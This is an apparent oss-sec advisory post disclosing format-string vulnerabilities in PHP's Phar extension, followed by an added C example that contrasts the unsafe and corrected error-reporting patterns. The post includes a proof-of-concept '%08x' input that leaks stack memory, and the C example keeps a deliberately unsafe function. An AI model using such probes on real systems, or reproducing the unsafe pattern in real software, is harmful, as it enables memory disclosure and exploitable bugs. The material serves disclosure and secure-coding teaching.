oss-sec mailing list archives

Re: CVE request: format-string vulnerability in PHP Phar extension


From: Felipe Pena <felipensp () gmail com>
Date: Mon, 14 Mar 2011 10:59:04 -0300

2011/3/14 Felipe Pena <felipensp () gmail com>

Hi,
I just found several format-string vulnerabilities in the PHP Phar extension; a
bug has been filed in the PHP bugtracker (private):
http://bugs.php.net/bug.php?id=54247
On error, several class methods pass the supplied argument to zend_throw_exception_ex(),
which prints a formatted error message using that value as the formatter
string.

$ sapi/cli/php ../bug.php "%08x.%08x.%08x.%08x.%08x"
PHP Fatal error: Uncaught exception 'PharException' with message 'unable to
open phar for reading "00000008.00000000.bf95c204.0963e050.00000014"' in
/home/felipe/dev/bug.php:4


A fix has been committed for this issue:
http://svn.php.net/viewvc?view=revision&revision=309221

-- 
Regards,
Felipe Pena
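
The bug class reported above, shown as an added example that is not part of the original message and is not PHP or Phar source code: a message containing caller data is passed as the format string, next to the corrected call that keeps the format constant. throw_exception_ex(), report_unsafe() and report_safe() are hypothetical stand-ins, and the input is constructed so that both calls have defined behaviour.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a printf-style error API such as
 * zend_throw_exception_ex(): expands `format` into `out`. */
static int throw_exception_ex(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    int n;

    va_start(ap, format);
    n = vsnprintf(out, outlen, format, ap);
    va_end(ap);
    return n;
}

/* Flawed pattern: the message already contains caller data and is then
 * handed over as the format string, so any '%' in it is interpreted. */
static int report_unsafe(char *out, size_t outlen, const char *fname)
{
    char msg[256];

    snprintf(msg, sizeof msg, "unable to open phar for reading \"%s\"", fname);
    return throw_exception_ex(out, outlen, msg);
}

/* Corrected pattern: the format is a constant; caller data is only an argument. */
static int report_safe(char *out, size_t outlen, const char *fname)
{
    return throw_exception_ex(out, outlen,
                              "unable to open phar for reading \"%s\"", fname);
}

int main(void)
{
    /* Constructed input: "%%" takes no argument, so both calls are well defined. */
    const char *fname = "a%%b.phar";
    char unsafe[256], safe[256];

    report_unsafe(unsafe, sizeof unsafe, fname);
    report_safe(safe, sizeof safe, fname);
    printf("unsafe: %s\nsafe:   %s\n", unsafe, safe);
    return strcmp(unsafe, safe) == 0;   /* 0: the two outputs differ */
}
```

Declaring such a wrapper with the GCC/Clang format(printf) attribute lets -Wformat-security flag the non-literal format call at compile time.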
